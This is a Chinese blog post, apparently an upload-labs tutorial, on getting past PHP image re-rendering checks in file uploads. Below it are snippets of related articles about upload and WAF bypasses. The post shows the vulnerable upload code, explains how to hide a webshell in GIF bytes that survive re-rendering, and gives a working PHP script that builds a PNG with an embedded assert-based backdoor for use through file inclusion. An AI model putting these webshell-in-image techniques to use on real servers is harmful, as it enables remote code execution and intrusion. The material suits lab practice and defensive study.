文件上传之图片码混淆绕过

于 2023-09-10 19:11:05 发布
阅读量268 收藏
点赞数
文章标签: java 服务器 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/captain_miaomiao/article/details/129449244
版权

图片码混淆绕过

1.上传gif

imagecreatefromxxxx函数把图片内容打散,,但是不会影响图片正常显示

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];
 
    $target_path=UPLOAD_PATH.'/'.basename($filename);
 
    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);
 
    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);
 
            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
 
    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);
 
            if($im == false){
                $msg = "该文件不是png格式的图片!";
                @unlink($target_path);
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);
 
                @unlink($target_path);
                $is_upload = true;               
            }
        } else {
            $msg = "上传出错!";
        }
 
    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);
 
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}

首先copy命令生成图片马

然后上传图片马到服务器,保存返回后的图片

然后使用010editor比较,哪些内容没有被混淆,我们就可以把木马写在没有被混淆的内容里

然后直接文件包含,包含图片内的php代码

2.上传png

这里可以使用脚本进行图片马制作,里面的php代码基本不会被混淆

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);
 
 
 
$img = imagecreatetruecolor(32, 32);
 
for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}
 
imagepng($img,'./1.png');
?>

将图片放在该脚本下的同级目录,运行后生成1.png

生成后查看内容,发现有两个参数,一个GET参数0,一个POST参数1 那就0给到assert,1给到phpinfo();,成功包含 

喵喵队长12
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传绕过思路总结 - 先知社区1
08-03
在网络安全领域,文件上传绕过是一种常见的攻击手段,通常用于突破Web应用防护系统(WAF)的限制,实现恶意文件的上传。以下是对文件上传绕过思路的详细说明: 1. **Accept-Encoding 改变编类型**: WAF通常会...
【贴吧向】图片混淆加解密(PicEncrypt)
热门推荐
Enderman_xiaohei的博客
08-18 4万+
参考链接 PicEncrypt - github 图片混淆加解密 记录博文 一、前言 有时候,我们在逛贴吧的时候,会有人放出这样类似的图。 或者是这样 接着,可能会给一个神秘密钥,是一串小数,告诉你自己去揭开秘密。 一般,刚接触的小伙伴,肯定是一脸懵逼,这啥玩意啊。但是细细的看,肯定看的出来,这一张有内容的图片,但是像素全部打乱了,根本看不懂。 事实上,他们用的是一款叫 PicEncrypt 的应用。这款应用的作者设计的一个加解密混淆图片的算法,实现这个效果。(咱是用户,就不细究了) 二、简略的介
cookies反爬虫
python的神奇之旅
12-07 405
''' cookie反爬 ''' from common.tools import Tool import requests from scrapy.selector import Selector from urllib import parse class User_Agent: def __init__(self): self.tool = Tool.get_tool() def run(self): url = 'http://www.porters.
主流图片混淆技术分析
qq_37645194的博客
10-07 3486
主流图片混淆技术分析 本文整理自论文:J. Tekli, B. al Bouna, R. Couturier, G. Tekli, Z. al Zein and M. Kamradt, “A Framework for Evaluating Image Obfuscation under Deep Learning-Assisted Privacy Attacks,” 2019 17th International Conference on Privacy, Security and Trust (PS
12.混淆——混叠图像,对比敏感度,图像压缩_4
Tom的专栏
03-27 6236
目录 混叠图像 对比敏感度 图像压缩 总结 混叠图像 我们可以在图像中看到。这是一张更好的图片显示图像混叠。所以你可以看到,这是一个径向正弦波(Radio sine wave),你可以看到,当你越来越近的时候,像素应该摆动得越来越快(如图)。 最后像素就用完了。Okay,我没有足够的样本来知道变化有多快,这就是混叠的例子(如图)。 那么,它对你有什么影响呢?它对你的影响是你...
文件上传常用绕过方式
陈艺秋的博客
07-09 3218
这里能绕过的原理是因为windows的NTFS文件系统的一个特性,windows都适用在window的时候如果文件名+::$DATA会把::$DATA之后的数据当成文件流处理,不会检测后缀名且保持::$DATA之前的文件名,他的目的就是不检查后缀名也就是当我们访问时,也就是相当于访问a.php本身当我们访问时,也就是访问ab文件夹下的a.php文件本身。
上传绕过WAF的15中姿势
06-29
这是一篇围绕如何绕过Web应用防火墙(WAF)进行文件上传的技术文章,旨在帮助安全研究人员和技术人员了解当前绕过技术,并采取相应的防御措施。 ### 一、默认状态 这是最基础的状态,没有对请求头或文件名进行任何...
asp 判断上传文件中是否存在危险代
10-29
虽然这种方法提供了一定的保护,但它并不全面,因为恶意代可以采用更复杂的方式来隐藏或绕过这种简单的检查。例如,编混淆、或使用其他编程语言的命令。为了提高安全性,还可以采取以下措施: 1. **限制上传...
过360云查杀 文件增大工具小七网络特别版
08-20
从标签来看,主要关键词是“过360云查杀”和“文件增大工具”,这暗示了工具的主要特性:一是能够绕过360的安全检查,二是可以改变文件大小,可能是通过填充无意义的数据或者使用特定的技术来混淆文件内容。...
upload-labs文件上传靶场
11-24
这个靶场包含了21个精心设计的关卡,每个关卡都模拟了不同类型的文件上传绕过策略,旨在帮助用户提升对文件上传漏洞的挖掘与利用技能。 文件上传漏洞的本质在于,攻击者可以通过上传恶意文件到服务器,进而执行任意...
在线反混淆网站
someby的博客
06-29 2万+
https://www.bm8.com.cn/jsConfusion/
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
ChenD的学习笔记
10-23 7685
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
PHP代审计:文件上传图片渲染绕过
qq_22132931的博客
11-07 463
PHP代审计:文件上传图片渲染绕过
文章上传漏洞绕过方式(以php语言为例)
HMX404的博客
09-23 5859
一,文件上传漏洞原因 由于网站要求,需要用户上传文件图片,例如头像,保存简单文件上传下载,访问,如果我们将文件上传至web服务器上,并且可以访问到,那么就可以利用小马,对服务器进行操作,或者了解一些信息。因此在上传位置,代会对上传文件进行检查,但不免会有漏洞,通过代审计,可以得出网页漏洞。 二,文件上传漏洞绕过方式 前端验证 前端认证最容易绕过,我们将验证代部份删除,或者将js函数返回值设为1,无论上传什么文件,都是满足的文件就可以上传了,看浏览器接受了那些js文件,在js中寻找验证函数,利用工
文件上传图片混淆绕过与条件竞争
求大佬师傅带
09-07 1190
文件上传图片混淆绕过与条件竞争
android 图片资源混淆,图片混淆app下载_图片混淆下载安卓v1.0.1_软吧下载
weixin_29943753的博客
05-26 960
游戏简介图片混淆app为大家带来有趣的数据分享功能,进行轻松的手机照片处理功能,拥有好用的工具,大家可以进行视线混淆,对图案以及各种其他特效数据进行修改或者加密,保护个人隐私,进行良好的图片处理以及照片清理,有需要的可以简单操作下载体验。软件特色1.轻松的图片混淆功能,充分保护每一个用户的个人隐私,简单的操作模式以及隐私保护方法,让大家可以轻松处理各种软件;2.混淆您的视线,在这里进行轻松人像图片...
文件路径中容易混淆的写法
m0_46669225的博客
03-22 366
文件路径中容易混淆的写法 最近项目的时候对文件路径懵懵的,为了避免再次犯错统一整理一下 绝对路径 绝对路径,用反斜杠\ E:\test E:\test\file E:\test\file\data 相对路径 相对路径 ,用正斜杠 / 注意:/ 代表根目录 …/ 代表上一级目录 …/…/ 代表上两级目录 /…代表下级目录 /…/…代表下两级目录 ...
Android Studio代混淆设置以及上传mapping文件
薛瑄的博客
10-19 1万+
转载请标明出处:http://blog.csdn.net/xx326664162/article/details/49250203 文章出自:[薛瑄的博客](http://blog.csdn.net/xx326664162) 你也可以查看我的其他同类文章,也会让你有一定的收货! 参考: http://blog.csdn.net/zuiwuyuan/article/details/485527...
获取当前路径和当前路径的目录路径混淆
果冻先生的专栏
09-25 676
很简单,早就遇到过类似的问题,但是之前的解决方法记不清了,所以简单的问题还是记一下,防止后面再用吧。 import os current_file = os.path.abspath(__file__) print current_file current_dir = os.path.dirname(__file__) print current_dir current_dir1 = o...
文件上传漏洞的文件头绕过
最新发布
04-20
文件上传漏洞是一种常见的Web安全漏洞,攻击者通过绕过文件头检测机制,上传恶意文件到服务器上,从而执行任意代或者获取敏感信息。文件头绕过是指攻击者通过修改文件的内容或者文件名来欺骗服务器的文件类型检测机制,使得服务器无法正确判断文件的真实类型。 为了绕过文件头检测机制,攻击者可以采取以下几种方法: 1. 修改文件内容:攻击者可以在文件的开头添加一些特殊字符或者修改文件的二进制内容,使得文件头部的标识符不再符合服务器的文件类型检测规则。 2. 修改文件扩展名:攻击者可以将恶意文件的扩展名修改为服务器允许上传的合法文件类型的扩展名,从而欺骗服务器认为该文件是合法的。 3. 使用双重扩展名:攻击者可以将恶意文件的扩展名修改为两个或多个扩展名的组合,例如将`.php`文件修改为`.jpg.php`,这样服务器可能只会检测到第一个扩展名,从而误判文件类型。 4. 使用特殊编:攻击者可以使用特殊编对文件进行编,使得文件头部的标识符被隐藏或者混淆,从而绕过文件类型检测。 为了防止文件上传漏洞的文件头绕过,开发者可以采取以下几种措施: 1. 文件类型检测:在服务器端对上传的文件进行类型检测,可以通过检查文件的魔术数字、文件扩展名、MIME类型等方式来判断文件的真实类型。 2. 文件名过滤:对上传的文件名进行过滤,只允许合法的文件名字符,避免使用特殊字符或者路径分隔符。 3. 文件内容检测:对上传的文件内容进行检测,可以通过解析文件内容或者使用杀毒软件等方式来检测文件是否包含恶意代。 4. 文件权限设置:限制上传文件的存储路径的访问权限,避免攻击者通过上传恶意文件获取服务器的敏感信息或者执行任意代
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值